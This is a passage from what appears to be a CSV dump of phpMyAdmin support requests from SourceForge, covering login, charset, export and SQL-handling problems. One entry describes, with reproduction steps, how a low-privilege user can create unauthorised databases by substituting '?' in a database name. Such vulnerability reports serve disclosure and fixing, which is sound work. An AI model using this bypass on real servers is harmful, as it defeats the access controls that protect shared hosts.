Kind regards, Aidan Original URL https sourceforge.net p phpmyadmin support requests 722 https sourceforge.net p phpmyadmin support requests 722 Original author imho Found in version Latest Git","bug"
"24444","2541","Left frame does not display tables.
I have recently upgraded from 2.6.1 to 2.6.3 on a WinXP Apache 2.0.54 development server.
Welcome to phpMyAdmin 2.6.3 MySQL 5.0.0 alpha max nt running on localhost When I choose a database mysql for example) in the left frame, I get a message mysql No tables found in database.
However, a do get a list of the tables in the right frame.
I am not sure why the tables are not showing up on the left frame.
Original URL https sourceforge.net p phpmyadmin support requests 724 https sourceforge.net p phpmyadmin support requests 724 Original author arborrow","bug"
"24444","2542","Cannot login to phpmyadmin.
Hi I am trying to log into phpmyadmin 2.3.3, but it does not seem to log in at all, also this is creating a problem for any of our websites which use databases stored in this area as they cannot open them.
Does anyone have any idea what is causing this?
thanks Original URL https sourceforge.net p phpmyadmin support requests 725 https sourceforge.net p phpmyadmin support requests 725 Original author abbylon","bug"
"24444","2543","Aditional components for linked tables have been deactivated.
I m using the 2.4.0 version of phpMyAdmin which is the one provided by my hosting company) and when I execute this set of commands it shows me the error in the title CREATE TABLE `tblMensajes` `IDMensaje` bigint 20) NOT NULL auto increment, `TimePrint` timestamp 14) NOT NULL, `Tipo` smallint 6) NOT NULL default 0 , `Mensaje` longtext NOT NULL, `IDUsuario` bigint 20) NOT NULL default 0 , `IDRoom` int 11) NOT NULL default 0 , `nick` varchar 10) NOT NULL default , PRIMARY KEY `IDMensaje`) ) TYPE=MyISAM AUTO INCREMENT=24121 ; CREATE TABLE `tblRooms` `IDUsuario` int 11) NOT NULL default 0 , `IDRoom` int 11) NOT NULL default 0 , `nick` varchar 12) NOT NULL default , `TimePrint` timestamp 14) NOT NULL, PRIMARY KEY `IDUsuario`,`IDRoom`,`nick`) ) TYPE=MyISAM; CREATE TABLE `tblUsuarios` `IDUsuario` int 11) NOT NULL default 0 , `Nick` varchar 12) NOT NULL default , `Password` varchar 12) NOT NULL default , `Email` varchar 255) NOT NULL default , PRIMARY KEY `IDUsuario`), UNIQUE KEY `Email` `Email`), UNIQUE KEY `IDUsuario` `IDUsuario`) ) TYPE=MyISAM AUTO INCREMENT=6 ; My admin user has all privileges and still there s no way to make te DB work.
Could it be the version I m using?
I don t think the code is wrong since I m doing it from a tutorial.
Any suggestions?
Original URL https sourceforge.net p phpmyadmin support requests 726 https sourceforge.net p phpmyadmin support requests 726 Original author elafro Found in version 2.4.0","bug"
"24444","2544","User can create database if no rights.
We have databases created like this; example1 nl example1 com If a user logs on at phpMyAdmin, he has no rights to create a new database on the frontpage.
however, if the user goes to databases on the front page, he sees a new input box with Create new database .
The user still can t create a new database, but if the usr is entering example1?nl or example1?com he CAN create this database.
I ve tested it with mysql, mysql command line can t create that one, phpMyAdmin does!
Reproduction Create a user with minimal rights Assign the user a database like example1 nl Logon as the user Click Databases, create a new database called example1?nl As you can see, the user van always create the new database if the of the database is replaced with ?
The user has now access to 2 databases called example1 nl and example1?nl This is tested with 2.6.2 and 2.6.3 pl1.
Kind regards, Toon Martinali Original URL https sourceforge.net p phpmyadmin support requests 743 https sourceforge.net p phpmyadmin support requests 743 Original author fusieint","bug"
"24444","2545","Version.
I Need to know what my phpversion is?
How can I find out what my version is?
Welkom op phpMyAdmin 2.6.2 MySQL 4.0.24 I thought 2.6.2 but in a script it didn t work.
This script is to keep out a php injection.
And is a part of the include config.php script ?
gt; lt;head gt; lt;?php function quote smart value) \{ if get magic quotes gpc )) \{ value = stripslashes value); \} if version compare phpversion ), 2.6.2 ) == 1 ) \{ return mysql escape string value); \} else \{ return mysql real escape string value); \} \} ?
gt; lt; head gt; Original URL https sourceforge.net p phpmyadmin support requests 727 https sourceforge.net p phpmyadmin support requests 727 Original author menderes Found in version 2.6.2","bug"
"24444","2546","download size.
On the main page, it says the download size of the program is 2.970 kb, when it s actually 2970 kb!
This might not seem like a big deal, but it s a pretty annoying misrepresentation when you re on dialup.
Mike C. http www.coolgroups.com zoomer Original URL https sourceforge.net p phpmyadmin support requests 728 https sourceforge.net p phpmyadmin support requests 728 Original author mike931201","bug"
"24444","2547","UTF 8 characters broken in database.
I ve got all my tables and databases in utf8 general ci.
Everything works perfectly between my sites and mysql, but in phphmyadmin, when I browse the tables, every accents looks like xc3x82 , which won t bother me if when i want to edit a line, these characters were replaced by strange ?
character.
Original URL https sourceforge.net p phpmyadmin support requests 729 https sourceforge.net p phpmyadmin support requests 729 Original author mrcreak","bug"
"24444","2548","Broken Import with Insert Upd and Mass Slashes like and .
This is a high Problem with mass Slashes in a insert row.
I think this is a miss addslashes problem.
I cant import the attached File.
The attached File is exported with phpmyadmin.
Plz check this.
thx Original URL https sourceforge.net p phpmyadmin support requests 730 https sourceforge.net p phpmyadmin support requests 730 Original author ronny w","bug"
"24444","2549","Exporting sql csv Files Chosing between different charsets?.
phpmyadmin 2.6.3 pl1, MySQL 4.1.8) I would like to export german language) data sql files, csv files) with phpmyadmin.
The resulting text file is always in utf 8 encoding.
Is it possible to configure PMA or to have an export option to chose the desired export format, i.e.
chosing between utf 8 and latin1 ASCII) encoding?
Momentarialy I ve chosen phpmyadmin 2.5.3 because it does exactly what I want... character set client latin1 character set connection latin1 character set database latin1 character set results latin1 character set server latin1 character set system utf8) ...but of course I would like to update to the latest version.
I realized that I can get the desired behaviour in PMA 2.6.3 by setting cfg[ Lang ] = german iso 8859 1 ; This exports the sql csv files in latin1 ascii instead of utf 8 format.
But the GUI of PMA does not show 8 bit characters correctly in this special configuration anymore.
However, the database content is still shown correctly.
In 2.6.3, the following char variables are set in my config.
inc.php Language and charset conversion settings cfg[ DefaultLang ] = en iso 8859 1 ; cfg[ DefaultCharset ] = iso 8859 1 ; cfg[ AllowAnywhereRecoding ] = FALSE; BTW I know that I can get the desired behaviour with the help of mysqldump mysqldump default character set=latin1 ...) ), but this client cannot export csv files.
Thank you very much for your support, Thorsten Original URL https sourceforge.net p phpmyadmin support requests 731 https sourceforge.net p phpmyadmin support requests 731 Original author thorsten a","bug"
"24444","2550","regarding default value.
hello, when i set the filed NULL) to no for integer why it is setting 0, that should not be set to ZERO, why u r setting like this,please let me know, thanks Original URL https sourceforge.net p phpmyadmin support requests 732 https sourceforge.net p phpmyadmin support requests 732 Original author dayananda","bug"
"24444","2551","lxc2xa3< localhost .
I m actually using 2.6.3 pl1 but it isn t listed.
When I try to log in, I get the following message 1045 Access denied for user lxc2xa3 lt; localhost using password YES) although I placed the user root into the username box and the correct password for my root user.
It has only just started doing this it worked correctly about a week ago.
Any help feedback regarding this would be most appreciated.
James Original URL https sourceforge.net p phpmyadmin support requests 733 https sourceforge.net p phpmyadmin support requests 733 Original author jgxenite Found in version 2.6.3 rc1","bug"
"24444","2552","Duplicate entries for primary key.
Precondtion Database should exist Steps To Reproduce 1\.
In phpMyAdmin home page select desired database from left panel.
2\.
Click on SQL button on the Database page.
3\.
Write query INSERT INTO `tbl4` `Id`,`Age`, Address , Email ) VALUES 11 , 12 , aaa , a a.com ); 4.Click on GO button below Run SQL query queries on database label.
5\.
Repeat step 3,4.
Test Environment Browser IE 6.0 OS WinXP mysql version 4.0.24 Original URL https sourceforge.net p phpmyadmin support requests 750 https sourceforge.net p phpmyadmin support requests 750 Original author asif siddiqui Found in version 2.6.1 pl3","bug"
"24444","2553","collation doesnt change.
Well i changed my db collation but although phpmyadmin sais that collation changed when i browse my tables the collation is still latin swedish example cpg132 albums 12 MyISAM latin1 swedish ci 4.0 KB Original URL https sourceforge.net p phpmyadmin support requests 734 https sourceforge.net p phpmyadmin support requests 734 Original author tsakalos","bug"
"24444","2554","fields accepting the null values.
1.open phpMyadmin home page 2.create a new database 3.Create a table with fields 4.for one field keep that it is not null 5.click on insert tab 6.try to give null value for a non null column 7.It is accepting the values 8.write a query select from tablename 9.we get a notnull field getting the null value Test Environment mysql version 3.23.32 or higher I.E.
version 6.0 Operating System windows xp Original URL https sourceforge.net p phpmyadmin support requests 752 https sourceforge.net p phpmyadmin support requests 752 Original author lakshmiprasanna Found in version 2.6.1 pl3","bug"
"24444","2555","mbsrting.
I get this error when i open up phpMyAdmin The mbstring PHP extension was not found and you seem to be using a multibyte charset.
Without the mbstring extension phpMyAdmin is unable to split strings correctly and it may result in unexpected results.
Can you tell me what is wrong?
Original URL https sourceforge.net p phpmyadmin support requests 736 https sourceforge.net p phpmyadmin support requests 736 Original author guitarwaveadmin Found in version 2.6.3 rc1","bug"
"24444","2556","new table page stops loading halfway.
When I want to add a new table to a database, phpmyadmin starts loading the add table page, but stops loading halfways.
When I only use 2 fields, it manages to load correctly.
Adding fields afterwards while editing the table) results in the same problem.
No error messages whatsoever are provided.
I tried reinstalling apache, SQL and phpmyadmin, and tried different versions of phpmyadmin, but I can t get it to work properly again, though it once did.
If anyone could help me I d be very pleased, thanx for now, Max Original URL https sourceforge.net p phpmyadmin support requests 738 https sourceforge.net p phpmyadmin support requests 738 Original author badreligiontuup Found in version 2.6.1 pl3","bug"
"24444","2557","RELATION VIEW LINK NOT AVAILABLE IN 2.6.3 pl1.
Hello, I installed the latest stable version phpMyAdmin 2.6.3 pl1.
When I choose a table and select Structure , Relation View is not available in this version!
So relation between tables can not be established!
Original URL https sourceforge.net p phpmyadmin support requests 739 https sourceforge.net p phpmyadmin support requests 739 Original author smeyk Found in version 2.6.3 rc1","bug"
"24444","2558","index accepting any value.
1.open phpMyAdmin project 2.In our database open a table 3.For one of the fieldsassign the index property and auto increment property 4.click on insert button after creation of table 5.try to insert any value for the field 6.Write a query select from table name; 7.We see that it is accepting any value we give Test Environment MySql 3.23.32 or higher Operating System windows xp Internet explorer 6.0 Original URL https sourceforge.net p phpmyadmin support requests 755 https sourceforge.net p phpmyadmin support requests 755 Original author lakshmiprasanna Found in version 2.6.1 pl3","bug"
"24444","2559","Some warning appear with php 4.4.0 version.
Version of the application phpMyAdmin 2.6.3 pl1 php version 4.4.0 mysql version 4.1 Warning null) ) 1 result set s) not freed.
Use mysql free result to free result sets which were requested using mysql query ) in Unknown on line 0 PHP Warning Unknown ) null) Unable to initialize module Module compiled with module API=20041030, debug=0, thread safety=1 PHP compiled with module API=20020429, debug=0, thread safety=1 These options need to match in Unknown on line 0 Original URL https sourceforge.net p phpmyadmin support requests 740 https sourceforge.net p phpmyadmin support requests 740 Original author fbisso","bug"
"24444","2560","IE6 requesting normal from server 404) solution.
Related to 1222965 Clean install of 2.6.3 pl1 on Windows 2003 Server and PHP 5.0.4, with several modified options in pma config.
The referer for each error is either phpmyadmin db details structure.php?lang=en utf 8 server=1 convcharset=iso 8859 1 collation connection=utf8 general ci db=anydb phpmyadmin tbl properties structure.php?lang=en utf 8 server=1 convcharset=iso 8859 1 collation connection=utf8 general ci db=12pd table =anytable Error s) occur with either native theme in use original or darkblue orange.
Whenever the mouse LEAVES a table row onmouseout) the browser makes a request for phpmyadmin normal , I imagine due to the existing handling of dynamic class swapping.
This appears to be the applicable code onmouseout= setPointer this, 2, out , D5D5D5 , CCFFCC , FFCC99 ); This code is automatically generated when a table structure or table contents view is displayed, though, so resulting html snippets won t likely help much.
Though it may not be the best solution, one fix is to change line 489 of functions.js from this theCells[c].setAttribute bgcolor , newColor, 0); To this if newColor!== normal ) theCells[c].setAttribute bgcolor , newColor, 0); ...which effectively just cloaks the problem of the underlying parsing problem under IE6 that makes the error appear, but it DOES fix the problem.
I also did not test this solution exhaustively to determine if it caused any negative effects outside of the http 404 correction I was seeking.
Thanks!
Shawn K. Hall Original URL https sourceforge.net p phpmyadmin support requests 741 https sourceforge.net p phpmyadmin support requests 741 Original author shawnkhall Found in version 2.6.3 rc1","bug"
"24444","2561","File not found 404) error.
It seams that the programmer forgot to delete the line number 114 as followed header cells[] = strType .
GLOBALS [ cfg ][ ReplaceHelpImg ] ?
PMA showMySQLDocu Reference , Column types ) lt;br gt; lt;span style= font weight normal gt; .
PMA showMySQLDocu Reference , Column types ) .
lt; span gt; ); in the file tbl properties.inc.php That causes many 404 error lines in the error log file of the Apache servers.
To stop those errors just delete that line Original URL https sourceforge.net p phpmyadmin support requests 742 https sourceforge.net p phpmyadmin support requests 742 Original author th3365598 Found in version 2.6.3 rc1","bug"
"24444","2562","Problem Insert Data from a textfile into table .
Insert data form a tectfile into a table is not inserting the data correctly.
I have a delimited text file with 290 rows of data.
581 rows are inserted but when I brows the table I see one row last row from text file) with data in the first column of the table only, and that data is comprised of data from the first three rows of the text file.
Any help or guidance would be appreciated.
Original URL https sourceforge.net p phpmyadmin support requests 744 https sourceforge.net p phpmyadmin support requests 744 Original author roscommon22 Found in version 2.5.0","bug"
"24444","2563","Drop database query is not working in SQL Query window.
1.Launch the application 2.Create a database using the SQL query window 3.Drop the database using the SQL query window 4.Notice that the database was not deleted, instead it gives a message saying that xc2x93The Drop Database Statements are disabledxc2x94 Original URL https sourceforge.net p phpmyadmin support requests 745 https sourceforge.net p phpmyadmin support requests 745 Original author chandramohan Found in version 2.6.1 pl3","bug"
"24444","2564","Creation of User with username USER who already exist).
Prerequisite Login to phpMyAdmin and open Privilages window by clicking on Privilages in Home page Test Steps 1.
In SQL Query Window enter the SQL Command GRANT SELECT , CREATE , EXECUTE ON .
TO User2 IDENTIFIED BY alt1234 WITH MAX QUERIES PER HOUR 0 MAX CONNECTIONS PER HOUR 0 MAX UPDATES PER HOUR 0 ; 2\.
Click on Go Expected Result Should display the error message User already exist Actual Result New user has been created and no error message.
In phpBugs.Zip, find create user2 firstime.jpg and create user2 secondtime.jpb Original URL https sourceforge.net p phpmyadmin support requests 746 https sourceforge.net p phpmyadmin support requests 746 Original author kavithareddy Found in version 2.6.1 pl3","bug"
"24444","2565","All the fields in a table can be selected as primary key.. Steps To Reproduce 1\.
In phpMyAdmin home page select desired database from left panel.
2\.
Click on SQL button on the Database page.
3\.
Write query CREATE TABLE `TBL1` `Id` INT 5 ) NOT NULL AUTO INCREMENT ,`Age` INT 2 ) ,`Address` VARCHAR 40 ) ,`Email` VARCHAR 20 ) NOT NULL ,PRIMARY KEY `Id` , `Age` , `Address` , `Email` )).
4.Click on GO button below Run SQL query queries on database label.
Test Environment Browser IE 6.0 OS WinXP mysql ver 4.0.24 Original URL https sourceforge.net p phpmyadmin support requests 747 https sourceforge.net p phpmyadmin support requests 747 Original author asif siddiqui Found in version 2.6.1 pl3","bug"
"24444","2566","The structure of the table is not displayed.
1.Create a table say xc2x91 Table1xc2x92 with two fields day xc2x91Eid and Enamexc2x92 2.Donxc2x92t insert any values into the above table 3.Now use the query xc2x93Select from Table1xc2x94 4.Notice the structure of the table is not displayed Note Without inserting any values into the table we should be able to see the structure of the table to see the list of fields that has been created in the table After inserting some values, we can see the structure of the table and the values into it.
Environment OS Microsoft XP Professional SP2 MySQL 4.2 IE 6.0.2 Original URL https sourceforge.net p phpmyadmin support requests 748 https sourceforge.net p phpmyadmin support requests 748 Original author chandramohan Found in version 2.6.1 pl3","bug"
"24444","2567","Creations of user with No User name from SQL Query Window.
Prerequisite Login to phpMyAdmin and open Privilages window by clicking on Privilages in Home page Test Steps 1.
In SQL Query Window enter the SQL Command GRANT SELECT , CREATE , EXECUTE ON .
TO IDENTIFIED BY WITH MAX QUERIES PER HOUR 0 MAX CONNECTIONS PER HOUR 0 MAX UPDATES PER HOUR 0 ; 2\.
Click on Go Expected Result Should display the error message.
Actual Result New user has been created and no error message.
Original URL https sourceforge.net p phpmyadmin support requests 749 https sourceforge.net p phpmyadmin support requests 749 Original author kavithareddy Found in version 2.6.1 pl3","bug"
"24444","2568","The History tab in the SQL query window is not working.
1.Open an existing database from the application 2.Click the xc2x91Query Windowxc2x92 in the left pane of the application 3.Execute the default Query present in the SQL tab 4.Now click the xc2x91Historyxc2x92 tab in the Query window 5.Notice the Currently executed query will be displayed in History tab 6.Now write a new query in the xc2x91SQLxc2x92 tab and execute it 7.Click on the xc2x91Historyxc2x92 tab 8.Notice the newly executed query is not their Environment OS Microsoft XP Professional SP2 MySQL 4.2 IE 6.0.2 Original URL https sourceforge.net p phpmyadmin support requests 751 https sourceforge.net p phpmyadmin support requests 751 Original author chandramohan Found in version 2.6.1 pl3","bug"
"24444","2569","pma reload navigation not found mysqli).
PHP v4.4.0 MySQL v4.1.12 Fatal error Call to undefined function pma reloadnavigation ) in home phpmyadmin header.inc.php on line 135 Original URL https sourceforge.net p phpmyadmin support requests 763 https sourceforge.net p phpmyadmin support requests 763 Original author inovx Found in version Latest Git snapshot","bug"
"24444","2570","Created database is not dropped.. Steps to Reproduce 1.Open my phpMyAdmin.
2.Click SQL link,a pop up window displays.
3.Create a database CREATE DATABASE Applabs 4.Try to drop the database using SQL query like DROP DATABASE Applabs.
Error Noticed Created database is not dropped along with its content.
Acutal Result Created database should be dropped along with its content.
Original URL https sourceforge.net p phpmyadmin support requests 753 https sourceforge.net p phpmyadmin support requests 753 Original author shivu bd Found in version 2.6.1 pl3","bug"
"24444","2571","Accepting the values in NOT NULL fields.
Steps to Reproduce 1.Open my phpMyAdmin.
2.Click SQL link,a pop up window displays.
3.Create a database eg Applabs by using SQL query.
4.Create a table like CREATE TABLE Departments DepartmentID INTEGER AUTO INCREMENT NOT NULL,Department varchar 50), PRIMARY KEY DepartmentID)); 5.Insert a NULL value in place of Not Null in Department table.
6.Try to execute query.
Expected Result Null Value should not be accepted when a query contain NOT NULL built in function Actual Result Null Value field is accepting the NULL values , when query is executed.
Original URL https sourceforge.net p phpmyadmin support requests 754 https sourceforge.net p phpmyadmin support requests 754 Original author shivu bd Found in version 2.6.1 pl3","bug"
"24444","2572","primary key default value zero.
1.In phpMy Admin project,in our database open a table containing the primary key 2.try to give a null value for the primary key 3.try to retreive records using sql query 4.We see that in place of primary key it is taking the value as zero for first time Test Environment MySql 3.23.32 or higher Operating System windows xp Internet explorer 6.0 Original URL https sourceforge.net p phpmyadmin support requests 756 https sourceforge.net p phpmyadmin support requests 756 Original author lakshmiprasanna Found in version 2.6.1 pl3","bug"
"24444","2573","Browse table and insert form problems using PHP5.
A short description Ubuntu Hoary PHP5 5.0.4 0.6.hoary.1) using the repository on people.debian.org dexter MySQL 4.1 using the ubuntu repository Apache 2.0.53 libapache2 mod php5 using the repository on people.debian.org dexter IE 6.0.2900 and Firefox 1.0.4 If I use phpmyadmin tried from ubuntu package, latest stable phpMyAdmin 2.6.3 pl1 and latest cvs snapshot) then I get some weird output for the generated phpmyadmin pages each time I clicked on the browse for a table listing.
Most of the times the page is cut off right after the menu in the right pane).
Also, in the insert form I cannot enter more then a few characters due to maxlenght being set to 0, 12 or maybe other values.
First I thought it was an ouput compression problem but I followed all the steps in the phpmyadmin faq and found on different user mailing lists, but I guess I can forget about that.
No solution.
Then I thought it was be because of the fact that I have 3 libmysqlclient libraries all of them necessary due to differen other services installed).
The php5 mysql package from people.debian.org dexter is compiled against the MySQL 4.0 libs if I am correct), could this generate unexpected errors like the ones observed in phpmyadmin?
I can however connect from a remote server) using a remote phpmyadmin installation phpMyAdmin 2.6.2 pl1) and a user with appropriate permissions, so this more or less suggests it is not libmysqlclient related...
The remote phpmyadmin install has a different server setup Apache 1.3.29, PHP 4.3.11. and also multiple dynamic AND static) libmysqlclient libs.
The tables I try to browse DO contain data, I can query them using the mysql shell and the remote phpmyadmin app.
Oh, and I tried config and cookie auth.
Similar problems found http sourceforge.net forum message.php?
msg id=3004944 http sourceforge.net forum message.php?
msg id=2810946 http sourceforge.net forum message.php?
msg id=3167900 All seem to be PHP5 related.
No errors appear in Apache or PHP, even if I thinker with log levels.
thx jonas Original URL https sourceforge.net p phpmyadmin support requests 767 https sourceforge.net p phpmyadmin support requests 767 Original author jokari","bug"
"24444","2574","Primary key value should be unique.
Step To Reproduce 1.Open my phpMyAdmin.
2.Click SQL link,a pop up window displays.
3.Create a database eg Applabs by using SQL query.
4.Create a table with primary key CREATE TABLE Students StudentID INTEGER PRIMARY KEY NOT NULL,FirstName varchar 20),LastName varchar 20),HomePhone varchar 16)) 5.Enter query INSERT INTO Students values 1, Shiva , Kumar ,040125676).
6.Execute the query.
7.Repeat the steps 5 6 once again.
Original URL https sourceforge.net p phpmyadmin support requests 757 https sourceforge.net p phpmyadmin support requests 757 Original author shivu bd Found in version 2.6.1 pl3","bug"
"24444","2575","Partial Name values is displyed in columns.
Steps To Reproduce 1.Open my phpMyAdmin.
2.Click SQL link,a pop up window displays.
3.Create a database eg Applabs by using SQL query.
4.Create a table with primary key CREATE TABLE Students StudentID INTEGER PRIMARY KEY NOT NULL,FirstName varchar 20),LastName varchar 20),HomePhone varchar 16)) 5.Enter query INSERT INTO Students values 1, Shiva , Kumar ,040125676).
6.Execute the query.
7.Verify the correct values displayed in the correct column.
Original URL https sourceforge.net p phpmyadmin support requests 758 https sourceforge.net p phpmyadmin support requests 758 Original author shivu bd Found in version 2.6.1 pl3","bug"
"24444","2576","mysql 4.1 hashing on changing password uses 4.0 hashing.
Using RHEL4 with MySQL 4.1.10a and phpmyadmin 2.6.3 pl1 and when you login to phpmyadmin and then go to change password and choose the radio button next to MySQL 4.1 telling to to use the stronger encryption) upon submission it still uses MySQL 4.0 hashing algorithm.
You can tell this when you go to the users table in MySQL and it uses the shorter sequence of s. Original URL https sourceforge.net p phpmyadmin support requests 770 https sourceforge.net p phpmyadmin support requests 770 Original author pottsby","bug"
"24444","2577","6. int field accepting values more than the specified size.
1\.
Create a table with a int field.
2\.
Click the insert tab and in the int field insert value more than the specified size and click save button.
3\.
The int field is accepting values more than the specified size and when we try to access the values, a different number is displayed.
Environment MySql 3.23.32 OS Windows xp IE 6.0 Original URL https sourceforge.net p phpmyadmin support requests 759 https sourceforge.net p phpmyadmin support requests 759 Original author ravikiran ch","bug"
"24444","2578","Altering a table with out a master table.
1.open the phpMyAdmin project 2\.
open the database 3\.
click on SQL tab 4.write a query ALTER TABLE emp ADD FOREIGN KEY deptno) REFERENCES dept1 deptno); here Dept1 table is not present 5.We see a message that the table is created Test Environment MySql 3.23.32 or higher Operating System windows xp Internet explorer 6.0 Original URL https sourceforge.net p phpmyadmin support requests 760 https sourceforge.net p phpmyadmin support requests 760 Original author lakshmiprasanna Found in version 2.6.1 pl3","bug"
"24444","2579","Wrong message when drop option selected for table.
1\.
Select database link and in the tables table, check a table and select Drop option.
2\.
A message box is displayed with message, You are about to destroy the database with Ok and cancel buttons and when Ok button seleted, whole database is deleted 3\.
The database is getting deleted when we try to delete a table.
Original URL https sourceforge.net p phpmyadmin support requests 761 https sourceforge.net p phpmyadmin support requests 761 Original author ravikiran ch Found in version 2.6.1 pl3","bug"
"24444","2580","Dump file import problem.
phpmyadmin 2.6.3 mysql 4.1 Windows XP IIS 5.1 Hi, I m having a problem importing dump files I get the error File could not be read .
I changed the read dump to identifiy this is the last strFileCouldNotBeRead and i have found that it is this temp file that can t be read C \WINDOWS\TEMP\php41F.tmp Please can you help me.
Thanks Paul Original URL https sourceforge.net p phpmyadmin support requests 762 https sourceforge.net p phpmyadmin support requests 762 Original author paul virtual Found in version 2.6.3 rc1","bug"
"24444","2581","The cfgPmaAbsoluteUri directive MUST be set in your configu.
For the fifth time I need to know how to install phpmyadmin?
It s not working for me, because I don t understand the damn code.
I was hoping that AIT would have it included on their servers, but they don t, like everything else.
I keep getting this error The cfgPmaAbsoluteUri directive MUST be set in your configuration file!
What the heck is this code talking about in simple layman s terms?
What does it want me to do?
Can someone please enlighten me?
Thank you.
Original URL https sourceforge.net p phpmyadmin support requests 764 https sourceforge.net p phpmyadmin support requests 764 Original author joeallard Found in version Latest Git snapshot","bug"
"24444","2582","Space usage???.
Hello, don t know if I m on the right place here, but I don t know where else to post, so sorry if this place is wrong.
I m curious how it is realised in phpMyAdmin to display the space usage of a table, beacuse I need it also for a script of my own which I have to write for the school and which I will enhance.
I looked already through a part of the files but I haven t found the function, so if you can simply tell me the function and the filename where it can be found it would be nice.
If not could you please describe me how you solved the problem to display the data.
Thanks in advance, Sven Clement Original URL https sourceforge.net p phpmyadmin support requests 765 https sourceforge.net p phpmyadmin support requests 765 Original author isnipeu","bug"
"24444","2583","Subquery within a query causes error.
I m trying to run this query SELECT S.PRIMARY, S.FIRST, S.LAST FROM STATUS AS S WHERE S.PRIMARY IN SELECT C.PLAYER FROM CUPWINNERS AS C ) and I m getting the following You have an error in your SQL syntax.
Check the manual that corresponds to your MySQL server version for the right syntax to use near SELECT C.PLAYER FROM CUPWINNERS AS C ) LIMIT 0, 30 at line 1 If I run the subquery separately it works fine and returns a list of integer values.
If I replace the subquery with a list of integers see example) it works fine.
example SELECT S.PRIMARY, S.FIRST, S.LAST FROM STATUS AS S WHERE S.PRIMARY IN 58 , 89 , 103 ) Any idea why the combo query isn t working?
I ve looked for type mismatches, but I m comparing integers to integers.
I tried removing the AS keywords, and even using long hand table.field names ex STATUS.PRIMARY) and haven t gotten anywhere.
Please help!
Thanks, Brett Original URL https sourceforge.net p phpmyadmin support requests 766 https sourceforge.net p phpmyadmin support requests 766 Original author nordmap Found in version 2.4.0","bug"
"24444","2584","Extraction one field?.
HI I have a question, here is basically what i am trying to do NAME EMAIL LOGIN DATE NAME EMAIL EMAIL.COM 1 1 1 1 My question since lets say this is in the above database is there anyway to only extract export just the fields in the EMAIL FIELD???
PLEASE HELP!
Original URL https sourceforge.net p phpmyadmin support requests 776 https sourceforge.net p phpmyadmin support requests 776 Original author jonchryk Found in version 2.6.0 pl2","bug"
"24444","2585","Some functions results in 404 Errors.
Some functions like edit a row by clicking on edit pencil results in 404 not found error.
Original URL https sourceforge.net p phpmyadmin support requests 768 https sourceforge.net p phpmyadmin support requests 768 Original author petesky","bug"
"24444","2586","Can t do auth through squid proxy.
Hi!
I changed at config.inc.php the auth type to http and it doesn t work.. give me the error in the attachment file.
If I use config at auth type it works very well... i think that s a problem of phpmyadmin because everything worked always in any other page or php script in the same way.
Thanks!
Original URL https sourceforge.net p phpmyadmin support requests 769 https sourceforge.net p phpmyadmin support requests 769 Original author kmos","bug"
"24444","2587","Export Character Conversion Error.
MySql Ver.
4.1.8 nt PHP Ver.
4.3.10 phpMyAdmin Ver.
2.6.3 pl1 When I export data out of one of my MySql tables into a CSV for MS Excel file, a character that is stored in one of fields is being converted into another character when it is exported.
The original character stored in my table xc2x95 View of character after exported xc3xa2xc2x80xcbx98 I use bullets to signify the beginning of a spec description.
I don t want them changed when I export to a CSV file.
Also when use the export option Microsoft Excel 2000, the data is displayed in the phpMySql window but I have no way of saving the data to Excel other than copying the columns using Ctrl C and manually pasting them into a speadsheet.
What do I need to configure to keep the bullet character from changing?
Thanks, David http www.brassgate.com Original URL https sourceforge.net p phpmyadmin support requests 771 https sourceforge.net p phpmyadmin support requests 771 Original author brassgatellc","bug"
"24444","2588","database don t show up on left menu but do in right panel.
phpmyadmin 2.6.4 rc1 mysql MySQL 5.0.0 alpha max debug php 4.3.6 database don t show up on left menu but do in right panel i am upgrading from 2.5.7 pl1 and that works see attached pic my phpmyadmin is attached as well Original URL https sourceforge.net p phpmyadmin support requests 772 https sourceforge.net p phpmyadmin support requests 772 Original author scoles","bug"
"24444","2589","PHP Notice Constant XML ELEMENT NODE already defined.
I m running Win32 version of php 5.0.5 also tried with 5.0.4).
Every page throughout phpLDAPAdmin indicates that the XML constants are already defined...see below.
Any ideas or suggestions on how to get this working properly would be a relief.
I m guessing there s something wrong with my XML support, but what and where has got me hangin.
Please let me know if there s any other information you may need to help troubleshoot.
PHP Notice Constant XML ELEMENT NODE already defined in Unknown on line 0 PHP Notice Constant XML ATTRIBUTE NODE already defined in Unknown on line 0 PHP Notice Constant XML TEXT NODE already defined in Unknown on line 0 PHP Notice Constant XML CDATA SECTION NODE already defined in Unknown on line 0 PHP Notice Constant XML ENTITY REF NODE already defined in Unknown on line 0 PHP Notice Constant XML ENTITY NODE already defined in Unknown on line 0 PHP Notice Constant XML PI NODE already defined in Unknown on line 0 PHP Notice Constant XML COMMENT NODE already defined in Unknown on line 0 PHP Notice Constant XML DOCUMENT NODE already defined in Unknown on line 0 PHP Notice Constant XML DOCUMENT TYPE NODE already defined in Unknown on line 0 PHP Notice Constant XML DOCUMENT FRAG NODE already defined in Unknown on line 0 PHP Notice Constant XML NOTATION NODE already defined in Unknown on line 0 PHP Notice Constant XML HTML DOCUMENT NODE already defined in Unknown on line 0 PHP Notice Constant XML DTD NODE already defined in Unknown on line 0 PHP Notice Constant XML ELEMENT DECL NODE already defined in Unknown on line 0 PHP Notice Constant XML ATTRIBUTE DECL NODE already defined in Unknown on line 0 PHP Notice Constant XML ENTITY DECL NODE already defined in Unknown on line 0 PHP Notice Constant XML NAMESPACE DECL NODE already defined in Unknown on line 0 PHP Notice Constant XML LOCAL NAMESPACE already defined in Unknown on line 0 PHP Notice Constant XML ATTRIBUTE CDATA already defined in Unknown on line 0 PHP Notice Constant XML ATTRIBUTE ID already defined in Unknown on line 0 PHP Notice Constant XML ATTRIBUTE IDREF already defined in Unknown on line 0 PHP Notice Constant XML ATTRIBUTE IDREFS already defined in Unknown on line 0 PHP Notice Constant XML ATTRIBUTE ENTITY already defined in Unknown on line 0 PHP Notice Constant XML ATTRIBUTE NMTOKEN already defined in Unknown on line 0 PHP Notice Constant XML ATTRIBUTE NMTOKENS already defined in Unknown on line 0 PHP Notice Constant XML ATTRIBUTE ENUMERATION already defined in Unknown on line 0 PHP Notice Constant XML ATTRIBUTE NOTATION already defined in Unknown on line 0 Original URL https sourceforge.net p phpmyadmin support requests 773 https sourceforge.net p phpmyadmin support requests 773 Original author useraccount","bug"
"24444","2590","2.6.4 faiils with Apache2.0.54 win32 MySQL4.0.26 PHP5.0.5.
I ve run the CVS version of phpMyAdmin for years and noticed in late July that one of the updates caused the CVS to become unusable.
This problem still exists in the 2.6.4 release.
Some change seems to trigger the unable to read configuration file error, yet the config file contains no errors when using the included link to load it or manual checks.
